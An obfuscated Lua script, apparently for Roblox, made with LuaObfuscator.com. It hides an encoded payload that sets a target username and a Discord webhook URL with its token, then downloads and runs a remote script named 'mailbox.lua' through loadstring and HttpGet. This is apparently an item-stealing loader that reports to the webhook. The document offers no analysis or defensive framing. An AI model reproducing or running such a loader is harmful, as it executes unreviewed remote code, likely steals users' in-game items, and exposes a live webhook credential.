--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v69=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + ((1497 -(282 + 595)) -(555 + 64)))) ;return v69-(v69%(932 -(857 + 74))) ;else local v70=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v70 + v70))>=v70) and (1 + 0)) or ((1637 -(1523 + 114)) + 0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + ((283 + 990) -(226 + 1044)) );v19=v19 + ((974 -(892 + 65)) -13) ;return (v37 * (23917454 -7140238)) + (v36 * 65536) + (v35 * (1321 -(68 + 997))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=819 -(436 + 383) ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38==1) then v41=nil;v42=nil;v38=16 -(9 + 5) ;end if (v38==(376 -(85 + 291))) then v39=0;v40=nil;v38=1266 -(243 + 1022) ;end if (v38==(14 -10)) then while true do if (v39~=(0 + 0)) then else v40=0;v41=nil;v39=1;end if (v39~=2) then else v44=nil;v45=nil;v39=1183 -(1123 + 57) ;end if (v39==3) then v46=nil;while true do local v95=0 + 0 ;while true do if (v95~=(255 -(163 + 91))) then else if (v40~=(1932 -(1869 + 61))) then else local v109=0 + 0 ;while true do if (1~=v109) then else return v44;end if (v109~=0) then else for v159=3 -2 ,v24() do local v160=0;local v161;local v162;local v163;while true do if (1==v160) then v163=nil;while true do if (v161==0) then local v192=0;while true do if (v192==(1 -0)) then v161=1;break;end if (v192~=(0 + 0)) then else v162=0;v163=nil;v192=1;end end end if (v161==(1 -0)) then while true do if (v162~=(0 + 0)) then else v163=v22();if (v21(v163,1475 -(1329 + 145) ,1)~=(971 -(140 + 831))) then else local v193=1850 -(1409 + 441) ;local v194;local v195;local v196;local v197;while true do if (1==v193) then v196=nil;v197=nil;v193=720 -(15 + 703) ;end if (v193~=(0 + 0)) then else v194=0;v195=nil;v193=1;end if (v193==2) then while true do if (v194==(438 -(262 + 176))) then local v198=0;local v199;while true do if (v198==(1721 -(345 + 1376))) then v199=0;while true do if (v199==1) then v194=689 -(198 + 490) ;break;end if (v199==0) then local v211=0 -0 ;while true do if (v211==0) then v195=v21(v163,2,3);v196=v21(v163,9 -5 ,1212 -(696 + 510) );v211=1;end if (1~=v211) then else v199=1 -0 ;break;end end end end break;end end end if (v194~=(1265 -(1091 + 171))) then else if (v21(v196,1 + 2 ,9 -6 )==(3 -2)) then v197[378 -(123 + 251) ]=v46[v197[4]];end v41[v159]=v197;break;end if (2==v194) then local v201=0 -0 ;while true do if (v201==1) then v194=701 -(208 + 490) ;break;end if (v201==(0 + 0)) then if (v21(v196,1 + 0 ,837 -(660 + 176) )==(1 + 0)) then v197[204 -(14 + 188) ]=v46[v197[677 -(534 + 141) ]];end if (v21(v196,2,2)~=(1 + 0)) then else v197[3]=v46[v197[3 + 0 ]];end v201=1;end end end if (v194~=(1 + 0)) then else local v202=0 -0 ;while true do if (v202~=1) then else v194=2;break;end if (0==v202) then v197={v23(),v23(),nil,nil};if (v195==0) then local v209=0;local v210;while true do if (v209==(0 -0)) then v210=0;while true do if (v210==0) then v197[3]=v23();v197[11 -7 ]=v23();break;end end break;end end elseif (v195==(1 + 0)) then v197[2 + 1 ]=v24();elseif (v195==2) then v197[399 -(115 + 281) ]=v24() -((4 -2)^(14 + 2)) ;elseif (v195==(7 -4)) then local v216=0;local v217;local v218;while true do if (v216==0) then v217=0 -0 ;v218=nil;v216=868 -(550 + 317) ;end if (v216==1) then while true do if (0~=v217) then else v218=0;while true do if (v218==(0 -0)) then v197[3 -0 ]=v24() -((5 -3)^(301 -(134 + 151))) ;v197[4]=v23();break;end end break;end end break;end end end v202=1;end end end end break;end end end break;end end break;end end break;end if (v160==(1665 -(970 + 695))) then v161=0;v162=nil;v160=1;end end end for v164=1 -0 ,v24() do v42[v164-1 ]=v29();end v109=1;end end end break;end if (v95~=0) then else if (v40~=(1990 -(582 + 1408))) then else local v110=0;local v111;while true do if (v110==0) then v111=0;while true do if ((6 -4)~=v111) then else v40=1 -0 ;break;end if (v111==(0 -0)) then v41={};v42={};v111=1;end if (1~=v111) then else local v187=1824 -(1195 + 629) ;while true do if (v187~=(1 -0)) then else v111=2;break;end if (v187==0) then v43={};v44={v41,v42,nil,v43};v187=1;end end end end break;end end end if (v40==(1 + 0)) then v45=v24();v46={};for v113=1,v45 do local v114=0 + 0 ;local v115;local v116;local v117;while true do if ((0 -0)~=v114) then else local v166=0;while true do if (v166==(0 -0)) then v115=0 + 0 ;v116=nil;v166=1637 -(1373 + 263) ;end if ((1001 -(451 + 549))~=v166) then else v114=1;break;end end end if (v114==1) then v117=nil;while true do if (v115~=1) then else if (v116==1) then v117=v22()~=0 ;elseif (v116==(1 + 1)) then v117=v25();elseif (v116==(4 -1)) then v117=v26();end v46[v113]=v117;break;end if (v115~=(0 -0)) then else local v191=0;while true do if (v191==1) then v115=1385 -(746 + 638) ;break;end if (v191~=0) then else v116=v22();v117=nil;v191=1 + 0 ;end end end end break;end end end v44[4 -1 ]=v22();v40=343 -(218 + 123) ;end v95=1582 -(1535 + 46) ;end end end break;end if (v39==(1 + 0)) then v42=nil;v43=nil;v39=1 + 1 ;end end break;end if (v38==3) then v45=nil;v46=nil;v38=564 -(306 + 254) ;end if (v38~=2) then else v43=nil;v44=nil;v38=3;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1 + 0 + 0 ;local v50=(v21(v48,1,39 -(1519 -(1408 + 92)) ) * ((1469 -((1985 -(461 + 625)) + 568))^(22 + 10))) + v47 ;local v51=v21(v48,50 -(1317 -(993 + 295)) ,634 -(268 + 335) );local v52=((v21(v48,322 -(60 + 230) )==(573 -(426 + 146))) and  -(1 + 0)) or 1 ;if (v51==(1456 -(282 + 1174))) then if (v50==(811 -(569 + 242))) then return v52 * (0 -0) ;else v51=1 + 0 ;v49=1024 -(706 + 318) ;end elseif (v51==(3298 -(721 + 530))) then return ((v50==0) and (v52 * ((1272 -(945 + 326))/(0 -0)))) or (v52 * NaN) ;end return v8(v52,v51-(911 + 112) ) * (v49 + (v50/((702 -(271 + 23 + 406))^(1223 -(418 + 753))))) ;end v26=nil;function v26(v53)local v54=0 + 0 ;local v55;local v56;while true do if ((1 + 1)==v54) then v56={};for v76=1 + 0 , #v55 do v56[v76]=v2(v1(v3(v55,v76,v76)));end v54=1 + 1 + 1 ;end if (v54==(1 + 0 + 0)) then v55=v3(v16,v19,(v19 + v53) -1 );v19=v19 + v53 ;v54=531 -(406 + 123) ;end if (v54==(8 -5)) then return v6(v56);end if (v54==(1769 -(1749 + (59 -39)))) then v55=nil;if  not v53 then v53=v24();if (v53==(1900 -(106 + 1794))) then return "";end end v54=1;end end end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58=0 -(0 + 0) ;local v59;local v60;while true do if (v58==1) then return (v60 * 256) + v59 ;end if (v58==(114 -(4 + 110))) then v59,v60=v1(v16,v19,v19 + ((1306 -720) -((165 -108) + 527)) );v19=v19 + (1429 -(41 + 1386)) ;v58=104 -(17 + 86) ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v71=0;local v72;while true do if (v71==0) then v72=v2(v0(v61,16));if v20 then local v96=v5(v72,v20);v20=nil;return v96;else return v72;end break;end end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (1==v65) then v68=v62[3];return function(...)local v78=v66;local v79=v67;local v80=v68;local v81=v28;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do v90=v78[v82];v91=v90[1];if (v91<=5) then if (v91<=2) then if (v91<=0) then v64[v90[3]]=v88[v90[2]];elseif (v91==1) then local v118=v90[2];v88[v118]=v88[v118](v13(v88,v118 + 1 ,v83));else local v120=v90[2];local v121=v88[v90[3]];v88[v120 + 1 ]=v121;v88[v120]=v121[v90[4]];end elseif (v91<=3) then if ((v90[3]=="_ENV") or (v90[3]=="getfenv")) then v88[v90[2]]=v64;else v88[v90[2]]=v64[v90[3]];end elseif (v91>4) then v88[v90[2]]=v90[3];else local v130=0;while true do if (v130==4) then v82=v90[3];break;end if (v130==2) then v64[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v130=3;end if (v130==0) then v64[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v130=1;end if (v130==1) then v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v130=2;end if (v130==3) then v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v130=4;end end end elseif (v91<=8) then if (v91<=6) then local v103=0;local v104;local v105;local v106;local v107;local v108;while true do if (v103==7) then v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]();v82=v82 + 1 ;v103=8;end if (v103==1) then if ((v90[3]=="_ENV") or (v90[3]=="getfenv")) then v88[v90[2]]=v64;else v88[v90[2]]=v64[v90[3]];end v82=v82 + 1 ;v90=v78[v82];v108=v90[2];v103=2;end if (v103==5) then v105,v106=v81(v88[v108](v13(v88,v108 + 1 ,v90[3])));v83=(v106 + v108) -1 ;v104=0;for v156=v108,v83 do local v157=0;while true do if (v157==0) then v104=v104 + 1 ;v88[v156]=v105[v104];break;end end end v103=6;end if (v103==6) then v82=v82 + 1 ;v90=v78[v82];v108=v90[2];v88[v108]=v88[v108](v13(v88,v108 + 1 ,v83));v103=7;end if (v103==0) then v104=nil;v105,v106=nil;v107=nil;v108=nil;v103=1;end if (v103==4) then v88[v90[2]]=v90[3]~=0 ;v82=v82 + 1 ;v90=v78[v82];v108=v90[2];v103=5;end if (v103==8) then v90=v78[v82];v82=v90[3];break;end if (v103==2) then v107=v88[v90[3]];v88[v108 + 1 ]=v107;v88[v108]=v107[v90[4]];v82=v82 + 1 ;v103=3;end if (v103==3) then v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v103=4;end end elseif (v91>7) then local v131=0;local v132;local v133;local v134;local v135;while true do if (v131==1) then v83=(v134 + v132) -1 ;v135=0;v131=2;end if (v131==2) then for v184=v132,v83 do v135=v135 + 1 ;v88[v184]=v133[v135];end break;end if (0==v131) then v132=v90[2];v133,v134=v81(v88[v132](v13(v88,v132 + 1 ,v90[3])));v131=1;end end elseif (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif (v91<=10) then if (v91>9) then v82=v90[3];else do return;end end elseif (v91>11) then v88[v90[2]]=v90[3]~=0 ;else v88[v90[2]]();end v82=v82 + 1 ;end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D6503093O00736B65746368796F6D03073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313730333931393736303638322O35392O352F48324A5032677572474F4B794E5142524968476842314B6F77437758686F447651626C5231554C59614E344E5A57707745554E494235652O33507938625F2O2D7A46383300153O0012053O00013O0026073O000C0001000200040A3O000C0001001203000100033O001206000200043O00202O00020002000500122O000400066O000500016O000200056O00013O00024O00010001000100044O001400010026073O00010001000100040A3O00010001001205000100083O001204000100073O00122O0001000A3O00122O000100093O00124O00023O00044O000100012O00093O00017O00",v9(),...);
